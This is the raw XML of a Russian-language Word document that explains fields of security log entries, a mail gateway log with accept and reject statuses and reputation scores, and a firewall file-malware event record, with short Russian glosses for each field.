    </w:p>
    <w:p w14:paraId="7B739363" w14:textId="2C275287" w:rsidR="00BA14AC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>ACCEPT</w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>статус</w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>принят</w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047E74CF" w14:textId="5C06D1D1" w:rsidR="00BA14AC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 SG SUSPECTLIST match </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>sbrs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-3.0:-1.0] SBRS -1.6</w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>совпадения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F16DD" w14:textId="27BCB463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A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> country Germany</w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – город </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601F190F" w14:textId="0D34645F" w:rsidR="00BA14AC" w:rsidRPr="00A04197" w:rsidRDefault="006F14DE" w:rsidP="006F14DE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A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;22&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> - уровень </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4351DD" w14:textId="77777777" w:rsidR="00BA14AC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Dec 04 12:22:00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628D2307" w14:textId="77777777" w:rsidR="00BA14AC" w:rsidRPr="00A04197" w:rsidRDefault="00BA14AC" w:rsidP="006F14DE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mail_Logs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3437D921" w14:textId="77777777" w:rsidR="00BA14AC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Info: ICID 11444341 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CAEB91" w14:textId="6D50F110" w:rsidR="00BA14AC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A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">REJECT </w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>статус</w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>отклонен</w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB41FDC" w14:textId="4955BAEF" w:rsidR="00BA14AC" w:rsidRPr="00A04197" w:rsidRDefault="006F14DE" w:rsidP="006F14DE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">SG BLACKLIST match </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>sbrs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-10.0:-3.0] SBRS -5.5</w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>совпадения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792CF0BA" w14:textId="257E91AE" w:rsidR="006F14DE" w:rsidRPr="00A04197" w:rsidRDefault="006F14DE" w:rsidP="006F14DE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A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> country Mongolia</w:t>
      </w:r>
      <w:r w:rsidR="00BA14AC" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – город</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1A1AA3" w14:textId="03A78513" w:rsidR="00BA14AC" w:rsidRPr="00A04197" w:rsidRDefault="00BA14AC" w:rsidP="006F14DE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20574736" w14:textId="77777777" w:rsidR="00BA14AC" w:rsidRPr="00A04197" w:rsidRDefault="00BA14AC" w:rsidP="00BA14AC">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#5 FW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36354D65" w14:textId="0BBF4D0E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DeviceType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Estreamer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7843B5A0" w14:textId="6A88B0C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  <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>DeviceAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=10.10.10.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = адрес девайса </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0684E5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CurrentTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=1575440517963</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54686AEC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recordType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=FILE_MALWARE_EVENT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="198EE5BA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recordLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=258</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9872BB" w14:textId="69BD103C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  <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>timestamp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">=04 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Dec</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2019 12:21:55</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> = Это дает дату и время, когда произошло событие.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAD40FA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netmapDomainRef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=0</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D06ED84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fileEventData.connectionInstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=10</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EDAEB2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r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.connectionCounter=3278</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC8175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r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.connectionTimestamp=1575440514</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C85585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r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.fileEventTimestamp=1575440514</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16653039" w14:textId="3464EFA2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fileEventData.sourceAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">=172.2.3.4 = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Это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дает</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>адрес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исходного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устройства</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>которое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инициировало</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>соединение</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346EC0E6" w14:textId="63CF019E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  <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>destinationAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>=172.2.3.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> = Это дает IP-адрес целевого устройства, которое получило соединение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F89680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fileEventData.disposition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA4CB9C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fileEventData.speroDisposition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF52FA6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fileEventData.fileStorageStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3B833B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fileEventData.fileAnalysisStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6FE2EC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lastRenderedPageBreak/>
        <w:t>fileEventData.localMalwareAnalysisStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=5</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="049634AE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fileEventData.archiveFileStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=0</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="010B751C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fileEventData.threatScore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=0</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="038FEC87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fileEventData.action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23007D02" w14:textId="50EB696B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  <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>online</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>_126657052_3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pdf</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = здесь указывается имя файла, который был задействован в событии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B95686" w14:textId="02681FDA" w:rsidR="009F7CE7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  <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>=46197</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Здесь указывается размер файла в байтах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EB90E0" w14:textId="77FF49A6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  <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>direction</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>=2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9853EC" w14:textId="79C435F3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  <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>sourcePort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>=46037</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> = здесь указывается номер порта источника, используемого в соединении.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6594233E" w14:textId="2D3AB552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  <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>destinationPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>=30</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> = здесь указывается номер порта назначения, используемый при подключении.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CF2E7F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fileEventData.protocol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=6</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
